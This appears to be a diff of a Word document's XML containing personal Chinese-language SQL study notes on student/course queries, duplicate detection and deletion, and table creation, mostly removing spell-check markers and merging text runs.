+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  where sno in </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  ( select sno</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">      from sc</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">      where cno='2')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    and sno in</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  ( select sno</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">      from sc</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">      where cno='3');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">--or </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">(select sname </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  from student s, sc</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  where s.sno=sc.sno and cno='2')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> intersect</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">(select sname </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  from student s, sc</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  where s.sno=sc.sno and cno='3');</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">--or  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>这个应该是性能最好的，因为只是用了一次联合查询</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>select student.sname from student,sc where sc.cno='2' and student.sno IN (select student.sno from student,sc where student.sno=sc.sno and sc.cno='3') group by student.sno;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>寻找最大平均数：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:tab/>
+        <w:t>select student.sno from student,sc where student.sno=sc.sno group by student.sno having ( COUNT(sc.sno)&gt;=2 and AVG(sc.grade)&gt;=all (select AVG(grade) from sc group by sno) );</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">select student.sno from student,sc where student.sno=sc.sno group by student.sno having ( COUNT(sc.sno)&gt;=2 and AVG(sc.grade)=(select AVG(grade) from sc group by sno limit 1 order by desc) );   </w:t>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>寻找指定字段相同的记录：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">select * from Courses group by CourseId,ClassId having count(*)&gt;1;  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>就会将字段相同的个数</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>寻找只有特定字段不同的记录：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">select * from Courses as T1 where  exists (select * from Courses as A  where T1.CourseId=A.CourseId and T1.ClassId=A.ClassId and T1.ClassRemaining!=A.ClassRemaining)  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>缺点：我只有</w:t>
+      </w:r>
+      <w:r>
+        <w:t>8000</w:t>
+      </w:r>
+      <w:r>
+        <w:t>条记录，使用这个程序以后意味着需要</w:t>
+      </w:r>
+      <w:r>
+        <w:t>8000*8000*n</w:t>
+      </w:r>
+      <w:r>
+        <w:t>次比较，效率是真的低</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>使用</w:t>
+      </w:r>
+      <w:r>
+        <w:t>SQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>删除的前提其实就是你能够</w:t>
+      </w:r>
+      <w:r>
+        <w:t>select</w:t>
+      </w:r>
+      <w:r>
+        <w:t>到</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>删除重复：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>delete from Courses where  (CourseId,ClassId) in (select CourseId,ClassId    from Courses group by CourseId,ClassId      having count(*) &gt; 1);</w:t>
+      </w:r>
+      <w:r>
+        <w:t>每一次执行就会将重复的内容删除一遍。（但是</w:t>
+      </w:r>
+      <w:r>
+        <w:t>SQLITE</w:t>
+      </w:r>
+      <w:r>
+        <w:t>中执行了类似语句，删除了全部）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>使用</w:t>
+      </w:r>
+      <w:r>
+        <w:t>distinct</w:t>
+      </w:r>
+      <w:r>
+        <w:t>与</w:t>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve">select </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>sno,sname</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> from student where not exists(select * from sc where sc.cno='1' and sc.sno=student.sno);</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>查询选了</w:t>
-      </w:r>
-      <w:r>
-        <w:t>2</w:t>
-      </w:r>
-      <w:r>
-        <w:t>号课程和</w:t>
-      </w:r>
-      <w:r>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:t>号课程的学生的姓名。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">select sname      </w:t>
-      </w:r>
-      <w:r>
-        <w:t>选了二号课程的人以及</w:t>
-      </w:r>
-      <w:r>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
-        <w:t>号课程的人</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  from student</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  where sno in </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>( select</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> sno</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">      from sc</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">      where cno='2')</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    and sno in</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>( select</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> sno</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">      from sc</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">      where cno='3');</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">--or </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">(select sname </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  from student s, sc</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  where s.sno=sc.sno and cno='2')</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve"> intersect</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">(select sname </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  from student s, sc</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">  where s.sno=sc.sno and cno='3');</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">--or  </w:t>
-      </w:r>
-      <w:r>
-        <w:t>这个应该是性能最好的，因为只是用了一次联合查询</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">select </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>student.sname</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> from student,sc where sc.cno='2' and student.sno IN (select student.sno from student,sc where student.sno=sc.sno and sc.cno='3') group by student.sno;</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>寻找最大平均数：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:tab/>
-        <w:t xml:space="preserve">select student.sno from </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>student,sc</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> where student.sno=sc.sno group by student.sno having ( COUNT(sc.sno)&gt;=2 and AVG(sc.grade)&gt;=all (select AVG(grade) from sc group by sno) );</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">select student.sno from </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>student,sc</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> where student.sno=sc.sno group by student.sno having ( COUNT(sc.sno)&gt;=2 and AVG(sc.grade)=(select AVG(grade) from sc group by sno limit 1 order by desc) );   </w:t>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>寻找指定字段相同的记录：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">select * from Courses group by CourseId,ClassId having count(*)&gt;1;  </w:t>
-      </w:r>
-      <w:r>
-        <w:t>就会将字段相同的个数</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>寻找只有特定字段不同的记录：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">select * from Courses as T1 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>where  exists</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (select * from Courses as A  where T1.CourseId=A.CourseId and T1.ClassId=A.ClassId and T1.ClassRemaining!=A.ClassRemaining)  </w:t>
-      </w:r>
-      <w:r>
-        <w:t>缺点：我只有</w:t>
-      </w:r>
-      <w:r>
-        <w:t>8000</w:t>
-      </w:r>
-      <w:r>
-        <w:t>条记录，使用这个程序以后意味着需要</w:t>
-      </w:r>
-      <w:r>
-        <w:t>8000*8000*n</w:t>
-      </w:r>
-      <w:r>
-        <w:t>次比较，效率是真的低</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>使用</w:t>
-      </w:r>
-      <w:r>
-        <w:t>SQL</w:t>
-      </w:r>
-      <w:r>
-        <w:t>删除的前提其实就是你能够</w:t>
-      </w:r>
-      <w:r>
-        <w:t>select</w:t>
-      </w:r>
-      <w:r>
-        <w:t>到</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>删除重复：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>delete from Courses where  (CourseId,ClassId) in (select CourseId,ClassId    from Courses group by CourseId,ClassId      having count(*) &gt; 1);</w:t>
-      </w:r>
-      <w:r>
-        <w:t>每一次执行就会将重复的内容删除一遍。（但是</w:t>
-      </w:r>
-      <w:r>
-        <w:t>SQLITE</w:t>
-      </w:r>
-      <w:r>
-        <w:t>中执行了类似语句，删除了全部）</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>使用</w:t>
+      <w:r>
+        <w:t>创建一个新表。像</w:t>
+      </w:r>
+      <w:r>
+        <w:t>sqlite</w:t>
+      </w:r>
+      <w:r>
+        <w:t>这种不支持多个字段同时</w:t>
+      </w:r>
+      <w:r>
+        <w:t>in</w:t>
+      </w:r>
+      <w:r>
+        <w:t>的，就换这种。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">select distinct count(*) from courses; </w:t>
+      </w:r>
+      <w:r>
+        <w:t>显示的</w:t>
+      </w:r>
+      <w:r>
+        <w:t>count</w:t>
+      </w:r>
+      <w:r>
+        <w:t>还是原来的</w:t>
+      </w:r>
+      <w:r>
+        <w:t>count</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，先于</w:t>
       </w:r>
       <w:r>
         <w:t>distinct</w:t>
       </w:r>
       <w:r>
-        <w:t>与</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">select </w:t>
-      </w:r>
-      <w:r>
-        <w:t>创建一个新表。像</w:t>
-      </w:r>
-      <w:r>
-        <w:t>sqlite</w:t>
-      </w:r>
-      <w:r>
-        <w:t>这种不支持多个字段同时</w:t>
-      </w:r>
-      <w:r>
-        <w:t>in</w:t>
-      </w:r>
-      <w:r>
-        <w:t>的，就换这种。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">select distinct count(*) from courses; </w:t>
-      </w:r>
-      <w:r>
-        <w:t>显示的</w:t>
-      </w:r>
-      <w:r>
-        <w:t>count</w:t>
-      </w:r>
-      <w:r>
-        <w:t>还是原来的</w:t>
-      </w:r>
-      <w:r>
-        <w:t>count</w:t>
-      </w:r>
-      <w:r>
-        <w:t>，先于</w:t>
-      </w:r>
-      <w:r>
-        <w:t>distinct</w:t>
-      </w:r>
-      <w:r>
         <w:t>执行</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">insert into bookmark1 select * from bookmark &lt;=&gt;select * </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>into  bookmark</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">1 from bookmark;   </w:t>
+        <w:t xml:space="preserve">insert into bookmark1 select * from bookmark &lt;=&gt;select * into  bookmark1 from bookmark;   </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -17484,29 +16122,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">create table </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="009900"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>mytbl(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="009900"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">   </w:t>
+        <w:t xml:space="preserve">create table mytbl(   </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17550,29 +16166,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t xml:space="preserve">    name </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="009900"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>varchar(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="009900"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">50)   </w:t>
+        <w:t xml:space="preserve">    name varchar(50)   </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17586,7 +16180,6 @@
           <w:szCs w:val="21"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
@@ -17595,18 +16188,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>)type</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="009900"/>
-          <w:kern w:val="2"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>=MyISAM;</w:t>
+        <w:t>)type=MyISAM;</w:t>
       </w:r>
     </w:p>
     <w:p>
